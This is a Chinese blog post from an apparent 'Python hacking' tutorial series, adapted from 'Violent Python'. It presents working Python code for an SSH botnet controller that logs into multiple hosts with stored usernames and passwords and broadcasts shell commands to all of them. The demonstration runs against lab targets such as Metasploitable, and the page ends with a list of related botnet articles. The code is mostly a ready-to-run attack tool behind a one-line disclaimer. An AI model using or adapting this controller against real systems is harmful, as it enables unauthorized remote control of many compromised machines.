Python黑客攻防(十三)构建SSH僵尸网络

最新推荐文章于 2022-07-29 09:08:59 发布
最新推荐文章于 2022-07-29 09:08:59 发布
阅读量834 收藏 6
点赞数 1
分类专栏: Python黑客编程 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43681532/article/details/107749351
版权

注:本篇文章仅供学习交流,请勿用于非法用途。参考:《Python绝技:运用Python成为顶级黑客》。

前言

攻击者在达成恶意目的时,通常会使用被黑掉的计算机群。我们称之为僵尸网络”,因为被黑掉的电脑会像僵尸一样执行指令。

为构建僵尸网络,我们必须引入一一个新的概念一类。 类的概念是面向编程对象和编程模型的基础。在这一编程模型中,我们会把各个对象和它们所关联的方法一起实例化。 在我们的僵尸网络中,每个单独的僵尸或client(客户端)都需要有能连上某台肉机,并把命令发送给肉机的能力。

代码

# coding=utf-8
import optparse
from pexpect import pxssh

class Client(object):
  
    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.connect()

    def connect(self):
        try:
            s = pxssh.pxssh()
            s.login(self.host, self.user, self.password)
            return s
        except Exception, e:
            print e
            print '[-] Error Connecting'

    def send_command(self, cmd):
        self.session.sendline(cmd)
        self.session.prompt()
        return self.session.before


def botnetCommand(command):
    for client in botNet:
        output = client.send_command(command)
        print '[*] Output from: ' + client.host
        print '[+] Command is: ' + output + '\n'


def addClient(host, user, password):
    client = Client(host, user, password)
    botNet.append(client)


botNet = []
addClient('192.168.1.16', 'msfadmin', 'msfadmin')
addClient('192.168.1.14', 'root', '1')
botnetCommand('uname -a')
botnetCommand('whoami')

我们来看一下生成Client()类对象的代码。为了构造client 对象,需要主机名、用户名,以及密码或密钥。同时,这个类还要包含维持与肉机连接所需的方法—— connect()、send_command()和alive()。请注意,当我们引用属于类中的变量时,是以self后接变量名的方式表示它的。为了构建僵尸网络,我们要建立一个名为botnet 的全局数组,其中记录了单个client对象。接下来,我们要编写一个名为addClient()的方法, 它的输入是主机名、用户和密码,并以此实例化一个client对象,并把它添加到botnet 数组里。接下来的botnetCommand()函数只要一个参数——要发布的命令。这个函数遍历整个数组,把命令发送到botnet 数组中的每个chient上。

测试

kalilinux本机和msf靶机

在这里插入图片描述

微信公众号:黑客帮
在这里插入图片描述

肥胖喵
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黑客攻防实战,黑客入门到精通,收藏这一篇就够了
Javachichi的博客
12-06 2102
你知道在每天上网时,有多少黑客正在浏览我们计算机中的重要数据吗﹖黑客工具的肆意传播,使得即使是稍有点计算机基础的人,就可以使用简单的工具对网络中一些疏于防范的主机进行攻击,在入侵成功之后,对其中的数据信息为所欲为。当用户发现密码被盗、资料被修改或删除、硬盘变作一团空白时,再想亡羊补牢,却为时已晚。对于那些防范意识较差或对网络安全知识不甚了解的用户,常常极易成为黑客攻击的目标。因此,对于那些苦于收到网络安全迫害的读者,以及想入门网络安全的小伙伴,小编在这里给大家黑客攻防秘笈入门,需要本资料的,同时想要入坑黑客
Python-BYOB建立自己的僵尸网络
08-10
BYOB 是一个开源项目,为安全研究人员和开发者提供一个框架,来构建和运行基本的僵尸网络,以加深他们对每年影响数百万台设备并生成现代僵尸网络的复杂恶意软件的理解,从而提高他们指定应对这些威胁的对策的能力。
Python构建SSH僵尸网络
aiya2015的博客
03-18 281
构建SSH僵尸网络,先从SSH自动登陆脚本开始写起。 其中要用到 pexpect 模块 先看一下代码: 1 ssh_newkey = 'Are you sure you want to continue connecting' 2 child = pexpect.spawn('ssh root@localhost') #一看就懂,执行命令 3 ret = chil...
Python-黑客-004 用Python构建一个SSH僵尸网络-02 手动与SSH交互
weixin_30412013的博客
09-08 152
Python构建一个SSH僵尸网络-02 手动与SSH交互 — 登录SSH服务器端的 root 用户 我的电脑(攻击者)的系统:Ubuntu14.04 ; 用户名: aobosir@ubuntu:~$ 被攻击对象电脑(模拟的SSH服务端)的系统:Ubuntu16.04 ; 用户名:aobo@ubuntu:~$ 这一节,我们来手动的使用 SSH 连接目标电脑。 ...
构建SSH僵尸网络
qq_43776408的博客
11-07 461
每个单独的僵尸或client都能连接上某台肉鸡 以下实现了三台主机登录一台肉鸡 这三台主机分别实例化三个不同的Client对象 并加到数组中 然后通过函数botnetCommand读取用户输入的命令 并通过数组的Client对象调用send_command函数 三台主机并且每一台主机发送2条命令 所以最后又6条命令返回信息 #!/usr/bin/python # -*- coding: utf...
基于python网络攻防平台(CTF)设计与实现
07-30
网络攻防演练系统是基于python中flask框架下平台,该平台借助于网上各种CTF靶场设计框架进行构想,搭建一个CTF解题模式为主的网络攻防平台。系统主要完成以下几个模块:用户登录与注册系统模块、用户个人解答详情...
python网络安全攻防平台项目
最新发布
04-13
Python网络安全攻防平台项目】是一个基于Python 2.7和Django 1.9框架构建的项目,旨在提供一个全面的网络安全学习和实践环境。在这个项目中,开发者利用Python的强大功能和Django的高效Web开发能力,创建了一个集...
Python植物大战僵尸源代码
12-29
总的来说,Python版植物大战僵尸源代码是一个很好的学习资源,可以帮助编程爱好者了解游戏开发的基本流程,掌握Python编程和pygame库的使用,同时也能锻炼面向对象设计和游戏逻辑构建的能力。通过研究这个项目,你...
植物大战僵尸python源码打包
06-25
《植物大战僵尸Python源码解析及游戏开发学习指南》 在编程世界中,Python以其简洁易懂的语法和丰富的库支持成为了许多初学者和专业开发者的选择。本篇将围绕"植物大战僵尸Python源码打包"这一主题,深入探讨如何...
BYOB(建立自己的僵尸网络)-Python开发
05-25
BYOB(建立自己的僵尸网络)有疑问吗? 加入我们的Discord服务器免责声明:此项目应仅用于授权测试或教育目的。 BYOB是一个开放源代码项目,它提供了一个框架,可用于构建自己的僵尸网络入门指南视频教程有疑问吗? 加入我们的Discord服务器免责声明:此项目应仅用于授权测试或教育目的。 BYOB是一个开源项目,它为安全研究人员和开发人员提供了一个框架,以构建和操作基本的僵尸网络,以加深他们对每年感染数百万设备并产生现代僵尸网络的复杂恶意软件的了解,从而提高他们的能力。发展c
僵尸网络终端进程捕获python脚本(python版本3.7.3)
12-31
下一代防火墙NGAF发现终端有访问僵尸网路的告警,该告警不定时出现,特编写脚本在终端运行,捕获哪个进程访问僵尸网络目的ip。适合读者:网络信息安全运营工程师,网络信息安全事件溯源等
python构建SSH僵尸网络
weixin_33755554的博客
05-31 268
构建僵尸网络,主要使用的包为pexpect,Pexpect 是一个用来启动子程序并对其进行自动控制的 Python 模块,它可以用来和像 ssh、ftp、passwd、telnet 等命令行程序进行自动交互。python ssh登录集群1importoptparse2importpxssh3classClient:4def__init__(s...
Python 黑客 004 用Python构建一个SSH僵尸网络 01 简介
热门推荐
AoboSir.com
09-08 1万+
Python构建一个SSH僵尸网络 01 简介一. 构建一个SSH僵尸网络的流程图:Created with Raphaël 2.1.0手动操作,实现通过SSH连接目标服务器(手动)用 Pexpect 与 SSH 交互(自动)用 Pxssh 暴力破解 SSH 密码利用 SSH 中的弱私钥构建 SSH 僵尸网络二. 详细步骤第零步: 准备工作。手动操作,实现通过SSH连接目标服务器(手动) 构建
Python脚本进阶】2.2、构建一个SSH僵尸网络(下):利用SSH中的弱私钥
07-29 325
Python脚本进阶】
2-用Python搭建一个SSH僵尸网络
Just have fun
07-19 3753
源代码:https://github.com/LToddy/penetrationtestMorris蠕虫有三种攻击方式,其中之一就是用常见的用户名和密码尝试登录RSH(remote shell)服务。 RSH是1998年问世的,它为系统管理员提供了一种很棒(尽管不安全)远程连接一台机器,并能在主机上运行一系列终端命令对它进行管理的方法。后来人们在RSH中增加了一个密钥加密算法,以保护其经
僵尸网络的组建
jklbnm12的博客
10-27 1971
无论多么庞大的系统,都是由一个个具体的元素组成的,僵尸网络也不例外。我们在讨论系统的组建时,一般会讨论两个方面——“组成系统的元素都是什么”以及“这些元素是如何相互联系起来的”。对于僵尸网络来说,则分别对应着僵尸网络的节点和控制方式。本节会对这两个方面分别进行介绍。 节点 僵尸网络由大量功能节点共同组成,这些节点可能是普通PC、服务器或者移动设备 这三种节点分别有其各自的特性,下面依次进行介绍。 误区:DDoS攻击都来自PC组成的僵尸网络 “ DDoS攻击都是由僵尸网络发起的”,这几乎是一个安全领域.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值